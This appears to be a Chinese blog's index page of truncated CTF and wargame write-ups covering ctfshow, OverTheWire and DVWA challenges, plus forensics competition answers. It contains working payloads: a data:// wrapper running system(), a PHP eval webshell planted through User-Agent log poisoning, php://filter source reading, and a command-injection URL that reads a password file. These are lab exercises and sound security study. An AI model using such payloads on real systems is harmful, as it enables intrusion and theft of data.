ctfshow xxe漏洞
第373关-378关第373关1234567891011121314151617181920212223<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-01-07 12:59:52# @Last Modified by: h1xa# @Last Modified time: 2021-01-07 13:36:47# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i ...
ctfshow文件包含漏洞
第78题-第83题第78题直接file=php://filter/read=convert.base64-encode/resource=flag.php,然后命令行解密
或者使用data伪协议
第79题可以使用短标签绕过file=data://text/plain,<?=system('tac flag.php');?>
或者base64编码一下也可以
第80题日志投毒,没啥好说的ua改成Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0<?php @eval($_POST['cmd']); ?>
payload改成?file=/var/log/nginx/access.log&2=phpinfo();
结束
最后我结合蚁剑
第81题
依旧日志包含
第82题
ctfshow命令执行漏洞
第29关-第34关第29关123456789101112131415161718192021<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); ...
overthewire leviathan靶场
第0关第0关挺简单的,就是正常访问隐藏路径就行
第1关第1关通过IDA逆向可得密码是:sex
输入可得
第2关
这里需要用到命令注入,由于程序没有过滤你的输入,直接把输入拼接到 system() 函数中执行了
创建一个免费的目录,用软链接进行
此时命令变成了"touch /etc/leviathan_pass/leviathan3 b"
很明显跨权限读取到了文件
第3关这里感觉可能是想初步感受一下栈
其实就是很简单的一个函数的跳转
第4关
直接解密可得
第5关和前面差不多,创造软链接来迷惑程序
第6关不用多说,一个比较就行了
overthewire natas靶场
第0关在html代码中,右击获取就行
第1关禁右键了,加上vview--soource
第2关这里,说明files下有路径,查看可得
第3关还是信息泄露在 Web 开发中,如果你想告诉搜索引擎的爬虫(比如 Googlebot)不要去抓取网站的某些特定目录或文件,通常会在网站的根目录下放置一个特殊的文件。
第4关referer伪造
第5关cookie伪造
第6关
第7关路径穿越
第8关
这里是先对密码进行base64加密,然后反转,最后转hex,所以
第9关命令执行漏洞http://natas9.natas.labs.overthewire.org/index.php?needle=%3B+cat%20/etc/natas_webpass/natas10+%22%22+%3B&submit=Search
第10关
这里其实还考察了php grep的多文件扫描机制
grep -i .* /etc/natas_webpass/natas11 dictionary.txt这样一来,grep 就把这段命令解析成了:
要搜索的内容: .* (正则表达式,代表匹配任意字符)
搜索目 ...
overthewire Bandit靶场
xrh推荐的基础靶场,来玩一玩
第0关挺简单的,不说了
第1关
这里有linux的特殊符号’-‘号
这种情况下直接cta ./-
第2关--spaces in this filename--文件,加了空格
之前./就不行了,会被终端识别为多个文件,只能cat ./"--spaces in this filename--"
第3关
第4关
需要使用file查看文本文件
正常输出即可
第5关有提示1find . -type f -size 1033c
然后1cat "./maybehere07/.file2"
第6关
其中2>/dev/null是说错误输出就不弹出
第7关
第8关
第9关1strings data.txt
strings命令,用于查看文件可识别字符串
第10关
第11关考凯撒密码
第12关考解压缩就是一直解压-file-解压到最后就行
第13关考察ssh命令
这里说了本地无法连接,必须退到本地连接看看私钥文件
创建好文件后用ssh连接就行,注意如果报错的话应该是权限问题,改一下权限就好了
第14关
第15关使用ssl连接
1op ...
2026平航团体赛
手机1. 分析早起王的手机,手机型号为?【答案格式:Xiaomi13】Pixel 6
2. 分析早起王的手机,早起王最近想旅行,结合高德地图搜索记录,他最可能去的景点是哪个?【答案格式:黄山】西湖
3. 分析早起王的手机,早起王在什么时间加上倩倩微信的?【答案格式:2025-08-18 07:09:19】
2026/3/30 7:13:08.000
4. 分析早起王的手机,倩倩在2026年3月30号吃了什么?【答案格式:西湖醋鱼】麻薯小蛋糕和螺狮粉吧…
5. 分析倩倩的手机,倩倩手机的系统版本是多少?【答案格式:5.2.3.123】
6.0.0.380
6. 分析倩倩的手机,“舔狗”的微信内部ID是多少?【答案格式:wxid_ab12】wxid_uh5tfx2zi8yh22
7. 分析倩倩的手机,倩倩曾给一位好友推荐游戏,这个好友叫什么名字?【答案格式:杨梅】冰糖
8. 分析倩倩的手机结合逆向包,推荐的游戏叫什么?【答案格式:far echo】zero sievert
9. 分析倩倩的手机,倩倩一共阅读过多少条搜狐新闻?【答案格式:11】33
10. 分析倩倩手机逆向包,数据加密ap ...
2025獬豸杯
服务器部分主要是帮一位新佬做的题,只挂载就不做题了,尽可能简单点哈
我这里用FTK手动挂载(才不会说我火眼过期了没人帮我续呢T T),题目不是很难,唯一的难点是证书的续期问题,虽说有一个时间强制重置的方案,但是感觉续订证书更符合正常人思维一点
而且我一开始主服务器内存给少了,还以为是时间重置方案不行了…看网上有佬说还是正常的,就没测试了哈,我这里说一下如何进行k8s的证书续订
首先是FTK挂载
这里一定要是physical only->Block Device / Writable
然后账号和密码三台都是root/123456,一次就测试成功了,就不赘述了,要不然还要用hashcat爆破或者是进单用户模式强制去除密码
进入master服务器后就是进行网络的配置工作了
网络的配置开始可以先进master服务器,用ip addr查看网络环境,看出来是192.168.2.199,然后配置虚拟网络
重启服务器(或者不重启我感觉也可以)
证书更新主节点更新首先先更新一下kubelet.conf证书123456789# 1. 备份旧的(过期的)配置文件mv /etc/kubernetes ...
2025年美亚杯个人赛
镜像下载地址:链接: https://pan.baidu.com/s/1mmox4roLLUwMu3UIBo0vGw 提取码: 4u7e
容器密码:FEYn0MJLYy9zTQRFHlXGRkVqXv3IkE8h
案情介绍:警方接获报案,前往西贡布袋澳“处理一宗“伤人”事件。经初步调查,怀疑男子陈民浩以木棍袭击男子冯子超,导致冯子超头部受伤昏迷。冯子超已被送往医院救治,陈民浩则因涉嫌“伤人”罪被警方当场拘捕,被捕后一直保持缄默,拒绝交代案情细节。
进一步调查显示,两人冲突疑因女子梁燕玲而起。根据现场迹象推断,梁燕玲曾于事发时在场出现,经警方多方搜索后,至今仍未能与她取得联络。请参赛者根据提供的资料,深入分析线索,寻找梁燕玲下落,并还原事件真相。
背景资料:Green Technology Supply Co.Ltd.(绿创科技系统有限公司)为本港网络工程公司,主要业务是为企业客户铺设网络服务及安装各类服务器。
男子 FUNG Chi-chiu(冯子超),英文名为Duncan,30岁,未婚,香港出生,在Green Technology Supply Co. Ltd.任职工程师。
男子 C ...
dvwa暴力破解
DVWA靶场-暴力破解等级:high源码分析以下12345678910111213141516171819202122232425262728293031323334353637<?phpif( isset( $_GET[ 'Login' ] ) ) { // 检查Token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // 输入用户名 $user = $_GET[ 'username' ]; $user = stripslashes( $user ); $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS ...










